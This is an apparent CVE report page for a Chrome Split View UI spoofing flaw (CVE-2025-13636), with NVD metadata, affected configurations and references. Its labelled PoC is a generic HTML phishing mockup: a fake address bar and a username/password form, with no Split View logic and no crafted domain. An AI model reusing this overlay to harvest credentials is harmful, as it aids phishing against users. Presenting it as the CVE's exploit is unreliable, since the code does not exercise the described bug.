Security Vulnerability Report
CVE-2025-13636 CVSS 4.3 MEDIUM


Published: 2025-12-02 19:15:48
Last Modified: 2025-12-04 19:42:36

Description

Inappropriate implementation in Split View in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted domain name. (Chromium security severity: Low)

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

Configuration 1 (AND):
  cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
  cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
Configuration 2 (AND):
  cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
  cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
  cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
Google Chrome < 143.0.7499.41
Note: the NVD CPE match data below uses versionEndExcluding 143.0.7499.40, while the description states "prior to 143.0.7499.41"; check the vendor release notes for the exact fixed build.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2025-13636 PoC - Split View UI Spoofing -->
<!-- This PoC demonstrates the UI spoofing vulnerability in Chrome's Split View -->
<!-- Note: This is for educational purposes only -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-13636 UI Spoofing Demo</title>
  <style>
    body { font-family: Arial, sans-serif; padding: 20px; }
    .spoofed-ui {
      position: fixed; top: 50px; left: 50%; transform: translateX(-50%);
      background: #fff; border: 1px solid #ccc; border-radius: 8px;
      padding: 20px; box-shadow: 0 4px 6px rgba(0,0,0,0.1); z-index: 999999;
    }
    .fake-address-bar { background: #f1f3f4; padding: 10px; border-radius: 4px; font-family: monospace; margin-bottom: 15px; }
    .fake-button { background: #4285f4; color: white; border: none; padding: 10px 20px; border-radius: 4px; cursor: pointer; }
    .warning { background: #fef7e0; border-left: 4px solid #fbbc04; padding: 15px; margin: 20px 0; }
  </style>
</head>
<body>
  <h1>UI Spoofing Vulnerability Demo</h1>
  <p>Domain: <span id="domain"></span></p>
  <div class="spoofed-ui">
    <div class="fake-address-bar">
      🔒 secure-bank.example.com
    </div>
    <p>Please verify your identity:</p>
    <input type="text" placeholder="Username" style="display:block; margin:10px 0; padding:8px; width:200px;">
    <input type="password" placeholder="Password" style="display:block; margin:10px 0; padding:8px; width:200px;">
    <button class="fake-button">Sign In</button>
  </div>
  <div class="warning">
    <strong>Educational Warning:</strong> This PoC demonstrates how attackers can create fake UI elements that appear to be part of the browser's native interface. Always verify the actual URL in the address bar before entering credentials.
  </div>
  <script>
    // Show the page's real hostname for comparison with the fake bar above
    document.getElementById('domain').textContent = window.location.hostname;
    // Simulate Split View detection (a viewport-width heuristic only; it does not query the browser's Split View state)
    if (window.innerWidth > 1000) {
      console.log('Split View mode detected');
    }
  </script>
</body>
</html>

References

https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop.html (Release Notes, Vendor Advisory)
https://issues.chromium.org/issues/446181124 (Issue Tracking, Permissions Required)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13636", "sourceIdentifier": "[email protected]", "published": "2025-12-02T19:15:48.260", "lastModified": "2025-12-04T19:42:35.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Split View in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted domain name. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.40", "matchCriteriaId": "28874374-C1B5-4638-BCCD-0AC4F1DAA6EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.40", "matchCriteriaId": "28874374-C1B5-4638-BCCD-0AC4F1DAA6EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": 
"cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/446181124", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}